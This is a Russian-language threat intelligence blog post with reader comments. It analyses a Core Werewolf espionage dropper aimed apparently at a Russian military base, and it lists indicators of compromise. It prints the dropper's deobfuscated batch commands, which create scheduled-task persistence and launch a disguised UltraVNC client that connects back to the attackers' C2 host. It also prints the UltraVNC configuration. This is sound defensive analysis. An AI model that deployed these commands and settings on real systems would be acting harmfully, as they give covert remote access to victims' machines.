Специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженный из Армении (г. Гюмри) вредоносный файл, связанный с группировкой кибершпионов Core Werewolf. Он представляет собой самораспаковывающийся архив 7zSFX, предназначенный для скрытой установки и запуска легитимной программы удаленного доступа - UltraVNC.

Предполагаемой целью атаки является 102-я российская военная база. На это указывают следующие факты:

  • в качестве документа-приманки использовалось ходатайство о якобы представлении к госнаградам, в том числе "Ордену Мужества" военнослужащих, отличившихся в ходе проведения СВО;

  • вредоносный файл был загружен на VirusTotal из г. Гюмри (Армения), в котором дислоцируется 102-ая российская военная база.

Core Werewolf (PseudoGamaredon) — кибершпионская группа, которая активно атакует российские организации, связанные с оборонно-промышленным комплексом, объекты критической информационной инфраструктуры. Впервые были замечены в августе 2021 года. В марте 2024 г. Core Werewolf атаковала российский НИИ, занимающийся разработкой вооружения. А в начале апреля — российский оборонный завод. В своих кампаниях группа использует программное обеспечение UltraVNC.

Все подробности — в техническом блоге Дмитрия Купина, руководителя отдела по анализу вредоносного кода департамента Threat Intelligence компании F.A.C.C.T.

Технические детали

7zSFX-архив

Вредоносный файл 7ZSfxMod_x86.exe является исполняемым файлом формата PE32 и представляет собой самораспаковывающийся архив 7zSFX. Данный 7zSFX-архив предназначен для извлечения своего содержимого в каталог %TEMP% и запуск обфусцированного Batch-файла 5951402583331559.cmd.

При запуске самораспаковывающегося архива 7ZSfxMod_x86.exe выполняются следующие команды:

cmd.exe /c ren 5951402583331559 5951402583331559.cmd

cmd.exe /c copy /y "%CD%." "%CD%.."

cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd

Содержимое 7zSFX-архива:

  • 5951402583331559 - обфусцированный Batch-файл

  • dl02W62Y82w52l62d0.nq42X02g82l12L22i7 - конфигурационный файл UltraVNC (UltraVNC.ini)

  • Px69S29l29t79I69v3.ei89I49K79k99b89f2 - документ-приманка формата PDF (perevod.pdf)

  • TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 - исполняемый файл UltraVNC (OneDrives.exe)


Судя по дате и времени последней модификации содержащихся файлов в указанном 7zSFX-архиве, можно предположить, что атака могла начаться раньше 15 апреля 2024 г..

Дата и время последней модификации извлеченных файлов 7zSFX-архива в каталоге %TEMP%
Дата и время последней модификации извлеченных файлов 7zSFX-архива в каталоге %TEMP%

Файл 7ZSfxMod_x86.exe был загружен на VirusTotal 2024-04-15 16:17:23 UTC из Армении (г. Гюмри) через веб-интерфейс (f7a179f4 - web).

Информация о телеметрии загруженного 7zSFX-архива на VirusTotal
Информация о телеметрии загруженного 7zSFX-архива на VirusTotal

Batch-файл

Деобфусцированное содержимое Batch-файла
Деобфусцированное содержимое Batch-файла

Функциональные возможности Batch-файла 5951402583331559.cmd:

  • Создание копии PDF-файла документа-приманки:

    copy "Px69S29l29t79I69v3.ei89I49K79k99b89f2" "perevod.pdf"

  • Открытие документа-приманки для отвлечения внимания жертвы:

    start "" "%CD%\perevod.pdf"

  • Создание задачи в планировщике задач Windows для завершения работы процесса OneDrives.exe:

    schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012" /tr "taskkill /f /im OneDrives.exe" /sc daily /st 09:11

  • Создание копии исполняемого файла UltraVNC:
    copy "TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0" "OneDrives.exe"

  • Принудительное завершение задачи или процесса OneDrives.exe:

    taskkill /im OneDrives.exe /f

  • Создание задачи в планировщике задач Windows для запуска OneDrives.exe:

    schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe" /sc daily /st 09:12

  • Создание копии конфигурационного файла UltraVNC:

    copy "dl02W62Y82w52l62d0.nq42X02g82l12L22i7" "UltraVNC.ini"

  • Запуск файла OneDrives.exe:

    start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe

  • Создание задачи в планировщике задач Windows для запуска OneDrives.exe с параметрами подключения к серверу mailcommunity[.]ru:443:

    schtasks /create /f /tn "OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443" /sc daily /st 09:13

  • Запуск файла OneDrives.exe с параметрами для подключения к серверу mailcommunity[.]ru:443:

    start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443

Исполняемый файл OneDrives.exe (TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0) является легитимной программой удаленного доступа UltraVNC версии 1.2.0.5.

Документ-приманка

Документ-приманка perevod.pdf представляет собой ходатайство, содержащее список военнослужащих, представленных к госнаградам, в том числе — "Ордену Мужества" — за отличную службу в ходе проведения СВО, с указанием их звания, ФИО и личного номера.

Фрагмент содержимого документа-приманки (censored)
Фрагмент содержимого документа-приманки (censored)

UltraVNC

Злоумышленники используют для скрытого удаленного доступа к скомпрометированной системе легитимное ПО UltraVNC версии 1.2.0.5 с иконкой приложения OneDrive.

Иконка в ресурсах исполняемого файла OneDrives.exe
Иконка в ресурсах исполняемого файла OneDrives.exe

PDB-путь: L:\UltraVNC_INSTALL_VS2013\ultravnc_test2\UltraVNC Project Root\UltraVNC\winvnc\Release\winvnc.pdb

Конфигурационный файл UltraVNC.ini (dl02W62Y82w52l62d0.nq42X02g82l12L22i7) содержит следующие настройки:

[Permissions]
[admin]
FileTransferEnabled=1
FTUserImpersonation=1
BlankMonitorEnabled=0
BlankInputsOnly=0
DefaultScale=1
UseDSMPlugin=0
DSMPlugin=
DSMPluginConfig=
primary=1
secondary=0
SocketConnect=0
HTTPConnect=0
XDMCPConnect=0
AutoPortSelect=0
PortNumber=5612
HTTPPortNumber=5800
InputsEnabled=1
LocalInputsDisabled=0
IdleTimeout=0
EnableJapInput=0
RemoveAero=0
DebugMode=0
Avilog=0
path=Y:
DebugLevel=0
AllowLoopback=0
LoopbackOnly=0
AllowShutdown=1
AllowProperties=1
AllowEditClients=1
FileTransferTimeout=30
KeepAliveInterval=5
SocketKeepAliveTimeout=10000
DisableTrayIcon=1
MSLogonRequired=0
NewMSLogon=0
ConnectPriority=0
QuerySetting=2
QueryTimeout=10
QueryAccept=0
LockSetting=0
RemoveWallpaper=0
RemoveEffects=0
RemoveFontSmoothing=0
[UltraVNC]
passwd=отредактировано
passwd2=000000000000000000

Сетевая инфраструктура

В качестве C2 злоумышленники использовали домен mailcommunity[.]ru.

Whois-информация домена mailcommunity[.]ru
Whois-информация домена mailcommunity[.]ru

Этот домен был зарегистрирован год назад одновременно с другим доменом группы Core Werewolf, который использовался в кампании в 2023 году. За день до истечения срока жизни домена злоумышленники продлили его еще на год и в этот же день начали использовать его для проведения атак.

Фрагмент сетевой инфраструктуры атакующих
Фрагмент сетевой инфраструктуры атакующих

Стоит отметить, что разворачиваемый образец UltraVNC, его конфигурационный файл и адрес C2 такие же, как и в ранее раскрытых атаках.

Связанные файлы

Также специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженные из России в марте и апреле 2024 г. вредоносные исполняемые файлы, которые представляют собой ранее неописанные дропперы, реализованные на языке Go. Дропперы имеют идентичные функциональные возможности и они предназначены для скрытой установки и запуска клиента UltraVNC.
Конфигурационный файл и клиент UltraVNC совпадают по хеш-суммам с описанными выше в статье файлами, а также в качестве C2 используется тот же домен: mailcommunity[.]ru:443.

UPD: текст дополнен 17 августа в 14:18.

Индикаторы компрометации

7ZSfxMod_x86.exe
MD5: b4644e784d384e419a270c8a44f41dd2
SHA-1: 210d1c0e007de3c5815b1188de989799ff6b511a
SHA-256: 0de3e1349b12a96a99784c45aebbf88012562545af6ade624e78d0ff2cfd5f35

5951402583331559 (5951402583331559.cmd)
MD5: d41d327f59c2f407a8e946d5bd333fc9
SHA-1: 36ccb806682d370baf8f0f0c7a6424601caaed9a
SHA-256: 493a08471ca2bdb89f980a5b1fb005e31bc1ca714e2da973b708d0b125d6edea

dl02W62Y82w52l62d0.nq42X02g82l12L22i7 (UltraVNC.ini)
MD5: e265d15a83e52b9ced30f6a9d747b388
SHA-1: 6e5a802e42674f6c8de74b7bea6024f637ff39e3
SHA-256: 20b23cc90cbfbef9bb7cedfbb1b75f24a03ba96af8c576263077501814df6376

TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 (OneDrives.exe)
MD5: d45bdf072094435bbb534b9a0c254af5
SHA-1: e1c24d8bfab674937f498701f8b25d07c56dada0
SHA-256: 2bac8b29b52f7ddd4fd19a1ace8bbc2e4ae4e834a41275fb5865eeb5ab805275

Дропперы на Go:
Pdf.exe
MD5: 08b6f274e353ce8baba43624eb552736
SHA-1: 5b1b74b5fe12e11366b63c0d8bce9411330cfb48
SHA-256: bc96b7ee0ec9b01d6ec7b887ca8da6f452fbcc9203d6ab0a8f8ccfe4fe91900f

Pdf.exe
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b

Pdf.exe
MD5: 8ca78dd94dc795db041688a6eedf60a5
SHA-1: 70c9e8eccd43c6426cb9c86a4f76ad6d99d39dca
SHA-256: fbd4a8052a69221f27467904f83b6c36fadf0d77043ac9d0e35b2be2e43ea3a2

Pdf.exe (Указ Президента Российской Федерации от 11.03.2024 № 181.exe)
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b

Домен (С2):
mailcommunity[.]ru:443

IP-адрес:
185.139.70[.]84

Дополнительные индикаторы компрометации

Пути к файлам:

  • %TEMP%\5951402583331559.cmd

  • %TEMP%\Px69S29l29t79I69v3.ei89I49K79k99b89f2

  • %TEMP%\perevod.pdf

  • %TEMP%\dl02W62Y82w52l62d0.nq42X02g82l12L22i7

  • %TEMP%\UltraVNC.ini

  • %TEMP%\TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0

  • %TEMP%\OneDrives.exe

Процессы:

  • cmd.exe /c ren 5951402583331559 5951402583331559.cmd

  • cmd.exe /c copy /y "%CD%*.*" "%CD%.."

  • cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd

  • schtasks.exe /create /f /tn "OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012" /tr "taskkill /f /im OneDrives.exe" /sc daily /st 09:11

  • schtasks.exe /create /f /tn "OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe" /sc daily /st 09:12

  • schtasks.exe /create /f /tn "OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443" /sc daily /st 09:13

  • taskkill.exe /im OneDrives.exe /f

  • OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443

  • timeout.exe /t 1

  • timeout.exe /t 3

  • timeout.exe /t 4

  • timeout.exe /t 5

Задачи в планировщике задач Windows:

  • OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012 - "taskkill /f /im OneDrives.exe"

  • OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102 - "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe"

  • OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093 - "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443"

Комментарии (8)


  1. CatAssa
    17.04.2024 06:33
    +7

    А в чем соль-то? О том, что вояк можно справоцировал на запуск вредоноса, показав им список личного состава на награждение?

    ...ну, обнаружили на VirusTotal. И что? Или есть подтвержденный факт того, что этот файл попал на "категорированные" компы в/части?

    У вояк компы с выходом в интернет, с открытыми usb слотами и т.п.?

    Или новость о том, что на "категорированные" компы нельзя загружать и запускать левые исполняемые файлы?

    Или какая-то новая технология во вредоносе обнаружена? Зачем в статье указаны значения хэшей и имена файлов во временной директории?

    Или эта статья - послание от Алекса к Юстасу?


    1. Sad_Bro
      17.04.2024 06:33
      +3

      послание Алекса к Юстасу что бы пользовались Касперским.


      1. meeshanya
        17.04.2024 06:33
        +2

        На астра Линукс


    1. EditorF_A_C_C_T Автор
      17.04.2024 06:33

      Ох. Ну, как говорится, кто не понял, тот поймет.

      А если реально хотите разобраться, кому, когда и главное, зачем нужна Threat Intelligence, можем порекомендовать следующие книги и материалы:

      ⭐Intelligence-Driven Incident Response. R. Brown & S.J. Roberts

      Авторы объясняют, как разрабатывать упреждающую стратегию реагирования на инциденты. Книга научит задавать правильные вопросы, чтобы построить активную стратегию защиты. Написана простым языком.

      ⭐Psychology of Intelligence Analysis. R. Heuer

      Нестареющая классика от ветерана ЦРУ Ричардса Хойера. Описывает особенности нашего мышления, ошибки и предубеждения, которые генерирует наш мозг.

      ⭐Компьютерные сети. Принципы, технологии, протоколы
      В. Олифер и Н. Олифер База, которая объясняется на пальцах. Отлично подойдет для тех, кто делает первые шаги (https://t.me/F_A_C_C_T/3152) в изучении основ информационной безопасности.

      ⭐Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains (https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf)
      E. Hutchins, M. Cloppert, and R. Amin

      Авторы детально объясняют, как использовать разведку и анализ техник противника, чтобы защитить сети от атак. Можно встретить примеры и для начинающих аналитиков.

      ⭐The Diamond Model of Intrusion Analysis (http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf)
      S. Caltagirone, A, Pendergast, and C. Betz

      Простая и полезная книга для понимания основ киберразведки. Здесь приводится научный подход к анализу атак, в основе которого лежит так называемая бриллиантовая модель.


  1. useribs
    17.04.2024 06:33

    Как можно поменять иконку на схожую с OneDrive, оставив хеш сумму "легитимной программой удаленного доступа UltraVNC версии 1.2.0.5". Это должен быть уже другой хеш, и, соответственно, сигнатурой для блокировки


    1. AVX
      17.04.2024 06:33

      Речь скорее всего не о самом установщике, а ultravnc внутри. То есть это по сути тот же обычный UltraVNC, как надо настроенный.

      Мы у себя тоже использовали довольно много лет назад и довольно долго и успешно эту же версию UltraVNC, но у нас был собран из исходников, в которые мы вносили свои патчи, и использовали этот софт у себя. Ни один антивирус не ругался на него. Установщик тоже делали с возможностью полностью тихой установки, но не sfx архив, а через компиляцию в autoit. И это отлично работало - по psexec можно было поставить прямо одним кликом мыши.


    1. EditorF_A_C_C_T Автор
      17.04.2024 06:33

      Точно, спасибо! Добавили хеш данного клиента UltraVNC в иоки и упомянули про иконку приложения OneDrive.